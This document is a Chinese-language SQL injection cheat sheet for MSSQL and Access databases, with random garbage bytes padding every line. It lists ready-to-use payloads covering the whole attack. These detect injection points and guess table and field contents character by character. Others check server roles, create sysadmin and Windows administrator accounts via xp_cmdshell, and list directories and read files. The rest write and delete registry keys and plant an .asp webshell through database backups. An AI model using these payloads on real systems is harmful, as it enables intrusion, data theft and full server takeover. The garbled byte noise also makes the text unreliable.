1.判断是否有注入;and 1=1 ;and 1=2 A~u�gx~S0�
2.初步判断是否是mssql ;and user>0 HH[�b1�z2D
�@`<v��d�@
3.注入参数是字符'and [查询条件] and ''=' Ea@N:t?(8=
�K�DP7�u�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' [\���NyB�c
/e�sSM~*�H
5.判断数据库系统 0�r=:l/Pz�
Y|F�J1x$r
;and (select count(*) from sysobjects)>0 mssql l�^x5m]�Kt
DXj_\� R(}
;and (select count(*) from msysobjects)>0 access /�[YH��
W]
M�9{�?gM�9
b�?-Ep?G'\
EB�'(�%dH
6.猜数据库 ;and (select Count(*) from [数据库名])>0 tp2CMJc�{L
;\=W=wL�(�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �hv
18V�>8
�lgTa�vs�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 f/G�
�YDat
CLI!�(�8ZW
9.(1)猜字段的ascii值(access) vS�%r_�gf(
;L.@4b[�lP
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 bq�3G3oAyG
&)
7umdSgi
(2)猜字段的ascii值(mssql) iJ_FJ[ �U�
=/MAKi}�g�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��nfck3h�
p(U�U�H3%W
10.测试权限结构(mssql) 1P�&XG�@��
�3IHya=qN
Wd'wL"6D�e
h�A)tad�]
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- w�~�>V2u_-
��}�0���c�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �����Ex3�5
Ie>��)U)/$
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��xe[Cuy$P
*�G�o�t�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ���e�$|�g�
9�a�T#�7�B
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- s��
}�q6@I
AZ�cW�f��8
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- T�'2(s�H�k
3��X,9K23T
;and 1=(select IS_MEMBER('db_owner'));-- H�)1<� ;{:
xf���w)0S
6bC�C6�G�
+^hFs7j�e)
11.添加mssql和系统的帐户 O�� G#By6O
D�zX5_� kA
;exec master.dbo.sp_addlogin username;-- c�,�;-[s�n
;exec master.dbo.sp_password null,username,password;-- z-�n�hL=��
HErTFY+�vC
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 2bU�3�*m^M
%^}3:0���G
;exec master.dbo.xp_cmdshell 'net user username password <�N^2|�*3�
(u@p�[ncN}
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- `WH�P��#�z
i��F2/�:iP
;exec master.dbo.xp_cmdshell 'net user username password /add';-- y8�jk��9Tv
-�8&�M��^-
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t5�n$��s�F
�jI�0�gQ [
B@dA��?w.x
p;Kw$fQ?�
12.(1)遍历目录 '�Uqz���,�
R�+�IT�)2�
;create table dirs(paths varchar(100), id int) :�.Vn�����
.x7d!t:�(D
;insert dirs exec master.dbo.xp_dirtree 'c:\' ~0r:Wcj� x
��bY�7d��
;and (select top 1 paths from dirs)>0 ZZp6@@zyq'
�N8�;/Zd;^
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) rmut�w~nHD
=r�cqYPul0
O#fGHI<43[
X2!vC!4P?L
(2)遍历目录 5F��$ elW�
# ��(B� <n
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- GQO}�E@W6C
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 .�0;Z:�x_3
�MHJH@$|�]
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 J�SQNx2VqQ
[�5^"U+`{x
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �z
7OTL<h�
��d(zBd=�;
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 JX@/�rXFY}
37Vs���9w�
`~QS�3z��q
GGsD�R%U�
13.mssql中的存储过程 ZFh2v]|�!
_�M=
\s>;G
xp_regenumvalues 注册表根键, 子键 �dX�-Xz��g
OF*�m����9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��.p&4]�6�
=dz �
iR�_
xp_regread 根键,子键,键值名 Jj}+��tQ�f
w=I8�f�}(�
;exec xp_regread 5O<7<��O�B
E�\&~S+:Xp
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 gq4�le=�,v
}$r/�#F/Fn
xp_regwrite 根键,子键, 值名, 值类型, 值 v��L(7��|K
J@w Q3�#5a
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 eS9uKb�5n(
@13vn� �x�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ;QQL�Y���T
.~qu,�q7k~
xp_regdeletevalue 根键,子键,值名 �TyVn5XHl^
IG���Es1��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 g�H5E+J_�$
8�R}C��vzI
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Xq�MJe'%�r
FP�=%�e]vJ
sA=�WU(4^�
�=�b2/�g�[
14.mssql的backup创建webshell t��Wy�0%
-
-v#0.3z�m�
use model �7(AB�5�.O
S�b�I %��|
create table cmd(str image); 8?AFvua}r
�|�u�{NM1,
insert into cmd(str) values (''); :i�t52*�3=
]�P;Ng�=a�
backup database model to disk='c:\l.asp'; U�c]�S�7F#
j�h�\L)�a*
W3K?K-����
Q���[���J%
15.mssql内置函数 F[mL_JU
�
S,��,,�D+4
;and (select @@version)>0 获得Windows的版本号 u�uW._$.A>
��`+�cc{�k
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �c.�y�8�x�
]wC�g'EU�B
;and (select user_name())>0 爆当前系统的连接用户 f]N�2�(eM
l1��X�A9>n
;and (select db_name())>0 得到当前连接的数据库 zI77��#AUM
8TIc;'b�RM
d[�(Kg�X9
N�0h��*� |
16.简洁的webshell aj;OG^(!2_
F�@
lJk|*_
use model �57*`y'C�W
��O+hN?/>v
create table cmd(str image); ��7xidBV�x
q�_K8vGm4e
insert into cmd(str) values (''); %7WGodlXW�
gwwYz]'d>r
backup database model to disk='g:\wwwtest\l.asp';
